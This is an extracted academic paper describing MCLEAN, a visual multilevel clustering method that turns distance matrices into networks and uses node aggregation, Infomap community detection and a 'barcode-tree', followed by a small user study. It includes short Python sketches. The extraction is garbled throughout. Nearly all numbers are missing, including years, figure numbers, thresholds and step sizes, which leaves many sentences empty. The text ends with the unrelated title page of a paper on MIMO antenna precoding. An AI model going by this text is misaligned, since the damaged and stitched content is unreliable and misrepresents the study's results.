multilevel clustering and the network transformation of data to identify patterns. visual multilevel clustering there are several methods to perform clustering analysis, but only a few of them support visual analysis. even fewer provide interactive exploration capabilities of the clusters in different levels of detail. however, the importance of visual interaction for performing clustering analysis is increasingly recognized (nielsen et al., ), as the expert users are capable of steering the analysis to produce more meaningful results. the tacit knowledge often motivates the decisions of the users that algorithms are not able to process or incorporate by themselves. therefore, including a human in the loop for taking decisions and for guiding the analysis is essential (vogogias et al., ). hierarchical clustering has been long used in many different fields including biology, social sciences, and computer vision due to the ease of interpreting the output by the user. the selection of the clusters is based on a single similarity threshold, where the tree is cut at alcaide and aerts ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://bitbucket.org/vda-lab/mclean http://dx.doi.org/ . /peerj-cs. a uniform height. 
unfortunately, large and heterogeneous datasets usually require a more flexible approach allowing the user to explore different clustering scenarios. some methods have been proposed to cut the tree at different levels. langfelder, zhang & horvath ( ) suggested an automatic approach that cuts the branches of the dendrogram in different levels based on their shape. obulkasim, meijer & van de wiel ( ) proposed a procedure to detect clusters from the dendrogram, called guided piecewise snipping. the method overcomes the drawbacks of the fixed height cut approach by allowing the piecewise rather than the fixed-height cut and incorporating external data to decide upon the optimal cut. in the same line of research, mlcut (vogogias et al., ) is a tool that provides visual support for exploring dendrograms of heterogeneous data sets at different levels of detail. partition-based clustering techniques such as k-means and clarans (ng & han, ) attempt to break a data set into k clusters optimizing a given criterion. boudjeloud- assala et al. ( ) presented a semi-interactive system for visual data exploration of multidimensional datasets using iterative clustering. their framework connects the user and the data mining process, which allows the user to play an active role in the clustering tasks. looney’s approach (looney, ) implements a process of removing small clusters in an iterative way, reassigning them into more dense regions. in doing this, consistency in the clustering results is improved. similary, bruneau & otjacques ( ) proposed an approach to integrate user preferences into the clustering algorithm in an interactively way through d projection of the dataset. rinzivillo et al. ( ) proposed an exploratory methodology for exploring a large number of trajectories using clustering techniques. the grouping of the trajectories is progressively applied by the users refining the parameters of the clustering algorithm. graph representation the dendrogram visual representation is not scalable to larger datasets. a technique presented by chen, maceachren & peuquet ( ) uses a uniform threshold to provide improved visibility by simplifying the dendrogram representation. this is a useful technique for summarising the dendrogram in a selected level of detail and making it fit in smaller displays. however, it does not provide support for multilevel cuts or data exploration at multiple levels. given a matrix whose entries represent the similarity between data items, many methods can be used to find a graph representation. in fact, modeling data items as a graph is a common conceptualization used in hierarchical clustering algorithms. in a more general approach, ploceus (liu, navathe & stasko, ) offers an approach for performing multidimensional and multilevel network-based visual analysis on tabular data. users can flexibly create and transform networks from data tables through a direct manipulation interface. ploceus integrates dynamic network manipulation with visual exploration for a seamless analytic experience. the whatsonweb system (di giacomo et al., ) takes advantage of graph-based visualization created by the results of a web search engine. in their system, a search query produces a graph that represents sets of web pages as nodes, which are connected if documents are sufficiently semantically related. the strength of the relationship is encoded alcaide and aerts ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. 
with an edge weight and a topological clustering algorithm is recursively applied to the graph, forming a graph hierarchy and showing different levels of information. systems presented for clustering and exploration in duman, healing & ghanea-hercock ( ), desjardins, macglashan & ferraioli ( ), beale ( ) and lee et al. ( ) transform the data into a spring-embedded graph layout, encoding the distance between the elements as forces in the force-directed layout. the objective in these systems is the projection of the distances in a reduced dimension allowing clustering assignment using partitioning-based methods. links are usually omitted in the representation facilitating the readability of the spatialization of the nodes. they present an alternative to standard dimension reduction methods such as projection pursuit or multi-dimensional scaling. the network exploration of mclean can be considered close to the solutions proposed for the navigation of the clustering results for large-scale graph visualization systems, such as eades & feng ( ) and eades & huang ( ). they allow the user to navigate a graph by iteratively expanding or collapsing the aggregated nodes (meta-nodes). however, users often lose context when navigating clustered graphs with deeper hierarchies (abello, van ham & krishnan, ). methods the mclean method takes a similarity matrix of all data records as input, and produces a simplified graph representation showing a higher abstraction of the clustering process. mclean combines two visual representations. first, an overview plot (barcode-tree), related to a dendrogram and topological barcode plot, shows how the general cluster structure changes for different values of a parameter ε, indicating how close points need to be in the multi-dimensional space to be considered belonging to the same cluster. second, a node-link plot represents the clustering results at a given ε. for this ε, clustering information in the node-link diagram is dual-layered. first, graph connected components correspond to data clusters at this threshold ε. second, different colours within a connected component indicate that this subnetwork would be split when using a more stringent ε; in other words, it indicates substructures in this cluster. a connected component is a subgraph in which all the vertices are directly or indirectly connected. we use connected components to define the clusters in the dataset. in addition, mclean employs community detection algorithm to find subclusters inside connected components. as a result, user knowledge (tacit or other) can inform on whether a cluster is distinct or is a part of a larger cluster. this ambiguity is common in heterogeneous data sets. as most of the clustering techniques, the agglomerative algorithm that we use depends on one single parameter. this parameter is a threshold (�) that defines the distance of union between two data elements. we find similarities between the mclean approach and topological data analysis (tda). analyzing the multidimensional spaces from a topological structure perspective, interpreting the persistent homology by calculating the number of connected components (b from betti numbers) and using the persistence concept to define the optimal threshold of network representation prove that although the aims are distinct they share a same philosophy of analysis (topaz, ziegelmeier & halverson, ). alcaide and aerts ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. 
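as a concrete reading of this dual-layer idea, the sketch below links all points closer than ε, reads clusters off as connected components, and then looks for substructure inside each component with a community detection step. it is an illustrative python/networkx reconstruction under our own naming, not the authors' r implementation, and networkx's greedy modularity routine is used only as a stand-in for infomap, which mclean actually relies on.

```python
# illustrative sketch (Python/networkx), not the authors' R implementation;
# greedy modularity stands in for Infomap, MCLEAN's actual community detector
import numpy as np
import networkx as nx
from networkx.algorithms.community import greedy_modularity_communities

def epsilon_graph(dist: np.ndarray, eps: float) -> nx.Graph:
    """Every data point is a node; points within distance eps of each other are linked."""
    g = nx.from_numpy_array((dist <= eps).astype(int))
    g.remove_edges_from(nx.selfloop_edges(g))   # the diagonal of dist is zero
    return g

def clusters_and_substructure(dist: np.ndarray, eps: float):
    """Clusters = connected components at eps; substructure = communities inside each component."""
    g = epsilon_graph(dist, eps)
    result = []
    for comp in nx.connected_components(g):
        sub = g.subgraph(comp)
        communities = (greedy_modularity_communities(sub)
                       if sub.number_of_edges() > 0 else [set(comp)])
        result.append((sorted(comp), [sorted(c) for c in communities]))
    return result
```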
figure workflow diagram of the mclean algorithm, consisting of four steps: ( ) graph transformation, ( ) node aggregation, ( ) community detection, and ( ) barcode-tree creation. the mclean method consists of four parts as illustrated in fig. : ( ) transformation of the distance matrix into a node-link representation based on the threshold defined; ( ) simplification of the network creating aggregated nodes; ( ) detection of substructures employing community detection algorithms; and ( ) exploration of the resulting networks for different threshold values. the methodology in this section is illustrated using a dataset taken from the uci repository website (see fig. ). this dataset contains examples of control charts synthetically generated as described by alcock & manolopoulos ( ). we used dynamic time warping (dtw) for measuring similarity between the temporal sequences. figure illustrates both representations of the raw data (figs. a and b) and classical visualizations of the distance matrix such as the dendrogram (fig. c) and a scatterplot of the two first dimensions of multidimensional scaling (fig. d). figure representation of a synthetic dataset that contains examples of control charts synthetically generated by the process in alcock & manolopoulos ( ). (a) time series are treated as a unique group. (b) underlying (hidden) time series are split by their label. (c) dendrogram using single linkage. (d) two first dimensions of classical multidimensional scaling. color represents the label in the dataset. graph transformation multidimensional scaling (mds) projects the data elements in a reduced-dimension ordination space. two or three dimensions are often used, which is based on ease of visualization rather than on the dimensionality of substructures in the data. unfortunately, in some cases, these projections blur patterns due to the heterogeneity of the distances and the limitations of the space visualized. therefore, a change to the spatialization (such as network visualization) can help to overcome the limitations of complex datasets. an example of these weaknesses can be seen in the mds applied to the synthetic dataset in fig. d. although the distance matrix does not contain explicit network semantics, mclean uses this approach to transform the encoding of distances by the use of links in the network. moreover, the algorithm employed in the final drawing of the network (i.e., force-directed graph) is optimized to avoid overlapping between the nodes. the graph transformation step of mclean is similar to the dbscan method (ester et al., ), in that it relies on a parameter ε which defines the radius that designates points to be lying in each other's neighbourhood. in dbscan, a second parameter numpts is used to define the minimal number of points that can constitute a cluster. in mclean, however, all datapoints are considered network nodes, and datapoints that are within a distance ε from each other are linked. the result of this step produces a graph where there exists a path between two nodes if and only if they belong to the same connected component. at this stage of the methodology clusters are represented as connected components in topological space.
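the dtw distances mentioned above can be obtained with the classic dynamic-programming recurrence; the sketch below is a straightforward reference implementation for univariate series and is only meant to show where the distance matrix that feeds the graph transformation could come from (the paper does not detail a particular dtw implementation).

```python
# classic O(n*m) dynamic-programming DTW with absolute-difference local cost (reference sketch)
import numpy as np

def dtw_distance(a: np.ndarray, b: np.ndarray) -> float:
    n, m = len(a), len(b)
    d = np.full((n + 1, m + 1), np.inf)
    d[0, 0] = 0.0
    for i in range(1, n + 1):
        for j in range(1, m + 1):
            cost = abs(float(a[i - 1]) - float(b[j - 1]))
            d[i, j] = cost + min(d[i - 1, j], d[i, j - 1], d[i - 1, j - 1])
    return float(d[n, m])

def pairwise_dtw(series) -> np.ndarray:
    """Symmetric distance matrix over a list of 1-d series, e.g. the control-chart signals."""
    k = len(series)
    dist = np.zeros((k, k))
    for i in range(k):
        for j in range(i + 1, k):
            dist[i, j] = dist[j, i] = dtw_distance(series[i], series[j])
    return dist
```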
/fig- http://dx.doi.org/ . /peerj-cs. figure node-link network transformation using force-directed layout from the distance matrix us- ing a distance threshold of in part (a), in part (b), in part (c) and, in part (d). all data elements are represented as a node in the network. edges are defined based on the threshold. full-size doi: . /peerjcs. /fig- figure network representation of the clustered dataset using a parameter ε of in part (a), in part (b), in part (c) and, in part (d). this representation preserves the same structure shown in fig. . full-size doi: . /peerjcs. /fig- figure shows the graph transformation process for four snapshots of different parameters � applied to the same dataset. as � increases, the number of links grows between the nodes. node aggregation in case of large datasets, the node-link representation can become visually overwhelming for the user without a proper level of aggregation. the challenge is to extract understandable information buried in the structure of multiple nodes and links. in addition, a layout of the entire graph is costly to compute. mclean simplifies and highlights the structure of the raw network. this process of simplification is founded on the use of aggregating nodes (meta-nodes) that represent a subgraph at a higher level of abstraction. node aggregation is based on degree centrality, where the degree of a node is defined as the number of connections that the node has within a network. this value is computed for all nodes, and the highest one is the first candidate to be the center of an aggregated node (meta-node). all nodes connected directly with the candidate are converted into an aggregated node. all connections with other data elements are inherited in the meta-node keeping the structure of the connected component. the result of node aggregation for the graphs created in fig. is shown in fig. . alcaide and aerts ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure illustration of node aggregation process for a set of fifteen elements. (a) network without aggregation. node in the network is the best candidate to build the first meta-node. all nodes directly connected to this node become part of the meta-node. (b) network after the creation of the first meta- node. the aggregation continues until all nodes are aggregated. the best candidates are node and node at this step. (c) network at last stage of the aggregation process. node and become individual meta- nodes. (d) resulting aggregated network. full-size doi: . /peerjcs. /fig- our simplification graph approach was designed to preserve the structure of the input graph. according to archambault, munzner & auber ( ), a topologically preserving graph must respect the following two properties: . edge conservation: an edge exists between two meta-nodes m and m if and only if there exists an edge between two leaves in the input graph l and l such that l is a descendant of m and l is a descendant of m . . connectivity conservation: any subgraph contained inside a meta-node must be connected. by respecting these two properties, we ensure that the resulting graph preserves the topological features of the initial graph: edge conservation guarantees that any edge in the simplified graph is present in the initial graph, while connectivity conservation ensures that any path can continue through any meta-node (archambault, munzner & auber, ). 
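the degree-driven aggregation just described can be sketched as follows: repeatedly pick the unassigned node with the highest degree, absorb its unassigned neighbours into a meta-node, and continue until every node is assigned. this is our own simplified reading of the procedure in python/networkx, not the exact code of the r package; the simplified network with inherited edges can then be obtained, for instance, with networkx's quotient_graph over the resulting groups.

```python
# simplified reading of degree-based meta-node creation (not the exact MCLEAN code)
import networkx as nx

def aggregate_meta_nodes(g: nx.Graph) -> dict:
    """Map each node to the centre of the meta-node that absorbs it."""
    assignment = {}
    while len(assignment) < g.number_of_nodes():
        # best candidate: unassigned node with the highest degree
        center = max((n for n in g if n not in assignment), key=g.degree)
        assignment[center] = center
        for nb in g.neighbors(center):          # absorb its unassigned neighbours
            if nb not in assignment:
                assignment[nb] = center
    return assignment

def simplified_graph(g: nx.Graph) -> nx.Graph:
    """Meta-nodes inherit the edges of their members; connected components are preserved."""
    groups = {}
    for node, center in aggregate_meta_nodes(g).items():
        groups.setdefault(center, set()).add(node)
    return nx.quotient_graph(g, list(groups.values()))
```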
in mclean, meta-nodes are created through the densest nodes (highest degree) in a connected component. the node with the highest degree is the best candidate to be the center of the meta-node. figure a shows an illustration of a connected component where node eight is the best candidate. all nodes connected directly to the best candidate become part of the meta-node as shown in fig. b. a meta-node inherits the edges with the external nodes or meta-nodes that do not belong to it. the aggregation is an iterative process until all nodes become part of a meta-node. aggregated nodes are excluded from the process preventing them to be included into another meta-node. for example node ten is part of the meta-node of node eight. therefore, it cannot be included in or be a candidate for a new meta-node although it has the same degree as four and fourteen in fig. b. the number of connected components or clusters does not change after the simplification process. figure b show the result of the node aggregation process. community detection the simplified network representation (fig. ) preserves structural data in a compressed way, which together with community detection allows revealing substructures inside connected components. a community refers to a group of nodes that are internally alcaide and aerts ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure network representation of the clustered dataset using the distance threshold of in part (a), in part (b), in part (c) and in part (d). communities are detected through infomap. the coloring of nodes illustrates the communities detected by the algorithm. full-size doi: . /peerjcs. /fig- highly connected. community detection in networks is not a trivial problem, and many algorithms have been proposed. mclean relies on the infomap algorithm (information- theoretic method) (rosvall & bergstrom, ), which provides multilevel solutions for analyzing undirected, directed, unweighted, and weighted networks. in mclean, the number of data elements in each simplified node is used as vertex weight in the infomap algorithm to reduce the effect of aggregation. different communities in a single connected component are shown in different colors. figure shows the networks created after graph transformation (fig. ) and node aggregation (fig. ) applying the results of community detection. prevalence of communities increases with network size, as shown in fig. where part a does not reveal any substructure but part d shows three in a single connected component. barcode-tree as indicated above, the generated connected components depend on the value of parameter �, as can be seen in the four subplots in fig. . in general, the network consists of isolated vertices for small values of the threshold. at the largest value, the entire dataset is a single connected component. the selection of a representative threshold without prior knowledge of the underlying space is however difficult for any dataset. in addition, heterogeneous datasets may need multiple levels of partitions and therefore will require the exploration of multiple thresholds. in order to provide guidance in the parameter choice and a contextual overview of the relation between � and clustering results, mclean generates these graphs across a range of � values. 
these are subsequently combined in the tree representation called barcode-tree, which is inspired by both a clustering dendrogram and barcode representation (topaz, ziegelmeier & halverson, ) as used in topological data analysis. the barcode-tree (fig. ) is a visual representation of cluster arrangement. the horizontal axis corresponds to threshold � and refers to the distance measure of union between the data elements that define the network (see ‘graph transformation’ section). the individual components are arranged along the vertical axis of the plot. at any given threshold, the number of connected components is the number of lines that intersect the vertical line through the threshold. meta-nodes are formed in the join points that are alcaide and aerts ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure barcode-tree for a sequence of thresholds from to by steps of using gradient color to represent the number of communities for each connected component. full-size doi: . /peerjcs. /fig- aggregations of individual data elements or existing meta-nodes at a smaller threshold (see ‘node aggregation’ section). this tree overcomes the limitations of binary structure of a dendrogram, allowing for a more clear representation of branches. moreover, the barcode-tree implements a leaf ordering method motivated by the molo algorithm presented by sakai et al. ( ). the branches are evaluated backwards recursively (from the single cluster until the singleton) to be the center of the subtree at each threshold avoiding the crossing of the branches. meta-nodes for a small threshold are aggregated into new ones created by the larger threshold: if � ≤� ≤� ≤···≤�n− ≤�n then m ⊆m ⊆m ⊆···⊆mn− ⊆mn with mi being the meta-nodes in network i. if the user is interested in understanding the structure of the input data, then topological hierarchies are useful tools to explain the origin of all edges viewed in a cut. both the objective for the barcode-tree view in mclean and the barcode in tda is to find the persistent topological structures across a range of thresholds. those structures which persist over an extensive range are considered signals of the underlying topology. as the threshold changes, the topological structures of network change accordingly. in fig. , we see the representation of the connected component for the range of � from to . for �= , we see connected components because there are no connections amongst the individual elements in the dataset. for �= , we see a big connected component and a significant subset of individual elements, reflecting the fact that some vertices have joined into a larger connected component. for �= , we see a single connected component that indicates the joining of all data elements. the resolution of the plot depends on the number of evaluations, showing a general overview with only a few thresholds (fig. e) or allowing detailed understanding of connected component composition with a more dense covering of thresholds (fig. a). although the exploration of the connected components path around a threshold of interest can give an intuition of the resulting network, the analysis of the connected alcaide and aerts ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure set of five curves of connected components vs. threshold distance according to different granularities. 
(a) barcode-tree for the range of ε ( to ) by steps of , (b) by steps of , (c) by steps of , (d) by steps of and (e) by steps of and (f) by steps of . full-size doi: . /peerjcs. /fig- components using the network representation (fig. ) is a necessary step to identify hidden substructures using only the tree representation. for example, at threshold in fig. , we identify a single connected component. however, we identify more details in the structure of the network at fig. d. evaluation to understand the implications of the proposed methodology and the interaction between the visuals, we performed a qualitative evaluation regarding learnability and usability of mclean. we recruited six participants, including four doctoral and two post- doctoral researchers in the area of data science with knowledge of clustering techniques (e.g., hierarchical or k-means clustering) and dimensionality reduction techniques (e.g., multidimensional scaling and pca). none had seen or used mclean before the evaluation test. the goal of the evaluation was to identify qualitative insights about how well mclean supports the identification of patterns according to the simplification of the dataset. tasks and procedures we gave a brief introduction to mclean, explaining the fundamentals of the methodology and demonstrating the main functionalities of the interface developed to interact with the network and barcode-tree including the bidirectional selection of elements between the two visuals (see fig. ). a training exercise was performed to familiarize the participants with the mclean workflow using the fisher iris dataset (fisher & marshall, ). we asked the participants to explore the general patterns in the barcode-tree and specific topological structures utilizing the network representation and community finding results. alcaide and aerts ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure detection of patterns between the barcode-tree and dendrogram. part (a) highlights the four patterns detect by five out of six participants in the barcode-tree. part (b) shows the four patterns detected in the dendrogram. pattern b * was identified as an additional pattern by two out of five participants. full-size doi: . /peerjcs. /fig- we repeated the exercise for the actual evaluation over the control charts dataset, explaining only that it concerned time-series data. we asked the participants to think aloud, observed their interaction with the interface, recorded their patterns selection as hand-written notes, and sought their impressions and comments on the methodology after they completed the tasks. to conclude we asked them to complete a questionnaire to evaluate the efficacy and their satisfaction of mclean compared to dendrogram. we also sought to know how difficult the methodology was to learn and use, if there were any problematic design issues, and how we might be able to address the difficulties experienced by the participants. results and analysis the evaluation exercise was split into three parts: detection of patterns using the barcode- tree, selection of thresholds comparing the dendrogram and barcode-tree, and detection of patterns combining the network representation and barcode-tree. after the exercise, the questionnaire was provided to obtain user satisfaction and additional feedback. 
detection of patterns using the barcode-tree in a first evaluation, we sought to identify to what extent participants are able to identify the different underlying patterns as shown in fig. b. five participants (participants a–e) identified four different patterns in the temporal dataset using the barcode-tree exclusively for the range of � to by steps of (fig. ). participant f identified two patterns using the same representation, grouping pattern a , a and a as a single pattern and pattern a independently from the rest (see fig. ). identical results were found in the dendrogram exploration. in addition, pattern a was classified as a group of outliers by participants d and e. when identifying four patterns, users a-e aggregated type and type (see fig. b) signals into a single pattern (pattern a ; see fig. a), and type and type in pattern a . in both cases, the pairs behave similarly, but in opposing directions: a continually increasing or decreasing trend, or a shift in the middle of the time series. in each pair, the alcaide and aerts ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. global distance between the different types is small compared to the rest of patterns due to the sequence alignment using dtw. when using the dendrograms, (fig. b), participants a–e identified between three and five patterns. two or three groups were detected in the middle, and the heterogeneous data elements (pattern b ) were recognized as an additional pattern and misunderstood as two independent clusters by users b and e due to the location of the branches. participant c identified a single cluster containing signals of type , type and type , and another containing type and type . this result shows a slight loss of perception in the dendrogram compared to barcode-tree and a possible potential misinterpretation of the dendrogram due to to the position of the branches. changes in tree resolution did not present a change in the interpretation of participants when resolution was increased, i.e., steps of and (figs. a and b) but it did when the resolution decreased. three participants (b, c and e) detected six patterns when we evaluated the number of connected component in steps of as shown in fig. f. this fact reveals that different resolutions lead to different possible interpretations of the data. selection of cutoffs in dendrogram and barcode-tree using dendrogram exploration, only participant f experienced difficulties in cutoff selection, whereas participants a-e selected a single cutoff between thresholds and , describing two or three notable clusters and ungrouped data-elements. using the barcode-tree, participants a-e selected a similar threshold. participant d investigated an additional threshold at . participant f picked the threshold with the intention of exploring the network representation. the number of cutoffs was not limited in any of the representations allowing the user to explore different partitioning perspectives. overall, users were more confident in choosing thresholds using the barcode-tree than when using the dendrogram. a persistent segment starts at the � threshold of until the join of three clusters at threshold . discussion with the participants indicated that this persistence in the barcode-tree makes for better readibility and therefore higher confidence in threshold selection. 
in contrast, the binary union of the branches and non-optimisation of the leave ordering in the dendrogram can lead to misinterpretation of the cutoff selection leaving some elements outside of a potential cluster. detection of patterns combining the network representation and barcode-tree in this part, we aimed to evaluate the detection of the structures through community detection and interaction between the visualizations. we identified three relevant thresholds for the network representation at the start of the three most persistent topological structures (see fig. a), more specifically at threshold , , and , and invited the participants to describe the patterns seen using both the network and the tree representations (fig. ). we encouraged them to use the interaction between these visual encoding to clarify their relationship. three participants (c, e and, f) identified six patterns at threshold , while the others recognized four. the number of patterns recognized was three for all participants at thresholds and . both the network representation and the color- encoding to represent the communities detected by infomap were clear for all participants. alcaide and aerts ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure network representations of the synthetic time-series dataset (fig. ) at the beginning of the three most persistent structures detected in the barcode-tree. (a) network at threshold . the grey node corresponds to type signal. the two connected components correspond to signals of type / (blue and red) and type / (orange and green), respectively. in both cases, ascending—respectively descending—signals are combined in a single connected component but still distinguish between gradual or stepwise change based on colour. (b) network at threshold . the most significant connected com- ponent in the network integrates all signals in the dataset, excluding type represented as individual grey elements. two communities represented as different colors distinguish the ascending (blue) and descend- ing (orange) patterns of the network. (c) network at threshold . the single connected component net- work still allows the detection of the ascending and descending patterns and the high variability of signal type (green) due to the community detection algorithm. full-size doi: . /peerjcs. /fig- the difference in number of perceived patterns shows a critical sense of the community detection results, demonstrating the added value of the human in the pattern selection. user satisfaction and comments all the participants indicated that they liked the mclean methodology, especially the obtained interpretation due to the change of the layout in the network creation. although some participants considered the selection of thresholds and interpretation of community detections nontrivial, they still agreed that the methodology was consistent and the learning curve was not too high. participants strongly favored the use of mclean over dendrogram in terms exploration and clustering technique due to the better readability of the tree and the power of combining the two visualizations interactively. this indicates the benefits of this methodology as an interactive visual clustering facilitating the integration and evaluation of the results by the user. conclusion and future work in this paper, we described a method for interactive multi-resolution exploration of clustering results in complex datasets. 
evaluation experiments indicated that combining visualizations and analytical techniques can increase the understanding of the information for the user by providing more transparency and confidence to the process. although the number of clusters and their quality is strongly related to user behavior, we believe that this is actually a strength of the system (one that was specifically aimed for), and that these approaches used in conjunction are crucial to allowing a user-centric approach to information discovery, to exploit heterogeneous data sources better. alcaide and aerts ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. although the presented network and barcode-tree representations help the user in gaining insight in their data, there are some clear points for future work. for example, the current approach relies on single linkage clustering whereas average and/or complete linkage clustering might be more useful for particular datasets (especially where the distance matrix does not exhibit gaps). in addition, the current visual encoding of the barcode-tree shows visual artifacts (parallel lines merging with a cluster) depending on the granularity level used. finally, it will be useful to investigate further methods for directly comparing how data elements are integrated across thresholds. in conclusion, incorporating the domain user in the clustering process itself allows for retaining the richness of multilevel patterns in cluster results. mclean facilitates integrating tacit or other user knowledge in clustering result interpretation and exploration, while simplifying the representation of groups especially in the presence of noise or outliers. we argue that the mclean approach provides new opportunities beyond existing techniques for cluster visualization and exploration. acknowledgements the authors wish to thank houda lamqaddam for guidance in the design of the evaluation, and the evaluation participants for valuable feedback. additional information and declarations funding this research was supported by imec strategic funding , iwt sbo accumulate , and ku leuven coe pfv/ / symbiosys. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: imec strategic funding . iwt sbo accumulate: . ku leuven coe pfv/ / symbiosys. competing interests the authors declare there are no competing interests. author contributions • daniel alcaide conceived and designed the experiments, performed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • jan aerts conceived and designed the experiments, analyzed the data, wrote the paper, reviewed drafts of the paper. alcaide and aerts ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. data availability the following information was supplied regarding data availability: bitbucket: https://bitbucket.org/vda-lab/mclean. references abello j, van ham f, krishnan n. . ask-graphview: a large scale graph visualization system. ieee transactions on visualization and computer graphics ( ): – doi . /tvcg. . . alcock rj, manolopoulos y. . time-series similarity queries employing a feature- based approach. in: th hellenic conference on informatics. river edge: world scientific publishing, – . 
archambault d, munzner t, auber d. . grouseflocks: steerable exploration of graph hierarchy space. ieee transactions on visualization and computer graphics ( ): – doi . /tvcg. . . archambault d, munzner t, auber d. . tuggraph: path-preserving hierar- chies for browsing proximity and paths in graphs. in: visualization symposium, . pacificvis’ . ieee pacific. beijing, china: piscataway: ieee, – doi . /pacificvis. . . beale r. . supporting serendipity: using ambient intelligence to augment user exploration for data mining and web browsing. international journal of human- computer studies ( ): – doi . /j.ijhcs. . . . boudjeloud-assala l, pinheiro p, blansché a, tamisier t, otjacques b. . in- teractive and iterative visual clustering. information visualization ( ): – doi . / . bruneau p, otjacques b. . an interactive, example-based, visual clustering system. in: information visualisation (iv), th international conference. london: piscataway: ieee, – doi . /iv. . . chen j, maceachren am, peuquet dj. . constructing overview+ detail dendrogram- matrix views. ieee transactions on visualization and computer graphics ( ): – doi . /tvcg. . . desjardins m, macglashan j, ferraioli j. . interactive visual clustering. in: pro- ceedings of the th international conference on intelligent user interfaces. honolulu, hawaii: new york: acm, – doi . / . . di giacomo e, didimo w, grilli l, liotta g. . graph visualization techniques for web clustering engines. ieee transactions on visualization and computer graphics ( ): – doi . /tvcg. . . duman h, healing a, ghanea-hercock r. . an intelligent agent approach for visual information structure generation. in: intelligent agents, . ia’ . ieee symposium on. nashville: pisacataway: ieee, – doi . /ia. . . eades p, feng q-w. . multilevel visualization of clustered graphs. in: international symposium on graph drawing. springer, – . alcaide and aerts ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://bitbucket.org/vda-lab/mclean http://dx.doi.org/ . /tvcg. . http://dx.doi.org/ . /tvcg. . http://dx.doi.org/ . /pacificvis. . http://dx.doi.org/ . /j.ijhcs. . . http://dx.doi.org/ . / http://dx.doi.org/ . /iv. . http://dx.doi.org/ . /tvcg. . http://dx.doi.org/ . / . http://dx.doi.org/ . /tvcg. . http://dx.doi.org/ . /ia. . http://dx.doi.org/ . /peerj-cs. eades p, huang ml. . navigating clustered graphs using force-directed methods. journal of graph algorithms and applications ( ): – doi . /jgaa. . ester m, kriegel h-p, sander j, xu x. . a density-based algorithm for discovering clusters in large spatial databases with noise. in: kdd’ proceedings of the second international conference on knowledge discovery and data mining. portland, or: palo alto: aaai press, – . fisher r, marshall m. . iris data set. uc irvine machine learning repository. available at http://archive.ics.uci.edu/ml/datasets/iris. friedman j, hastie t, tibshirani r. . the elements of statistical learning. vol. . new york: springer series in statistics new york. jain ak, murty mn, flynn pj. . data clustering: a review. acm computing surveys (csur) ( ): – doi . / . . keim da, mansmann f, thomas j. . visual analytics: how much visualization and how much analytics? acm sigkdd explorations newsletter ( ): – doi . / . . langfelder p, zhang b, horvath s. . defining clusters from a hierarchical clus- ter tree: the dynamic tree cut package for r. bioinformatics ( ): – doi . /bioinformatics/btm . lee h, kihm j, choo j, stasko j, park h. . 
ivisclustering: an interactive visual document clustering via topic modeling. in: computer graphics forum. vol. . new jersey: wiley online library, – . liu z, navathe sb, stasko jt. . ploceus: modeling, visualizing, and analyzing tabular data as networks. information visualization ( ): – doi . / . looney cg. . interactive clustering and merging with a new fuzzy expected value. pattern recognition ( ): – doi . /s - ( ) - . ng rt, han j. . clarans: a method for clustering objects for spatial data mining. ieee transactions on knowledge and data engineering ( ): – doi . /tkde. . . nielsen cb, younesy h, o'geen h, xu x, jackson ar, milosavljevic a, wang t, costello jf, hirst m, farnham pj, jones sj. . spark: a navigational paradigm for genomic data exploration. genome research ( ): – doi . /gr. . . obulkasim a, meijer ga, van de wiel ma. . semi-supervised adaptive-height snipping of the hierarchical clustering tree. bmc bioinformatics ( ): doi . /s - - - . rinzivillo s, pedreschi d, nanni m, giannotti f, andrienko n, andrienko g. . visually driven analysis of movement data by progressive clustering. information visualization ( – ): – doi . /palgrave.ivs. . rosvall m, bergstrom ct. . maps of random walks on complex networks reveal community structure. proceedings of the national academy of sciences of the united states of america ( ): – doi . /pnas. . sakai r, winand r, verbeiren t, moere av, aerts j. . dendsort: modular leaf ordering methods for dendrogram representations in r. f research : . topaz cm, ziegelmeier l, halverson t. . topological data analysis of biological aggregation models. plos one ( ):e doi . /journal.pone. . vogogias a, kennedy j, archambault d, smith va, currant h. . mlcut: exploring multi-level cuts in dendrograms for biological data. in: cagatay t, tao rw, eds. computer graphics and visual computing conference (cgvc) . geneva: eurographics association doi . /cgvc. . international journal of advanced network, monitoring and controls volume , no. , doi: . /ijanmc- - multi antenna precoding algorithm based on m spread spectrum sun ruihua college of information engineering north china university of science and technology tangshan, hebei, china e-mail: @ .com an yongli* college of information engineering, north china university of science and technology tangshan, hebei, , china *corresponding author tongxinayl@ .com bai junying college of information engineering north china university of science and technology tangshan, hebei, china e-mail: @ .com abstract—mimo multi antenna technology can increase the capacity and channel utilization of the communication system without increasing the bandwidth, and become the key technology in the new generation of mobile communication system.
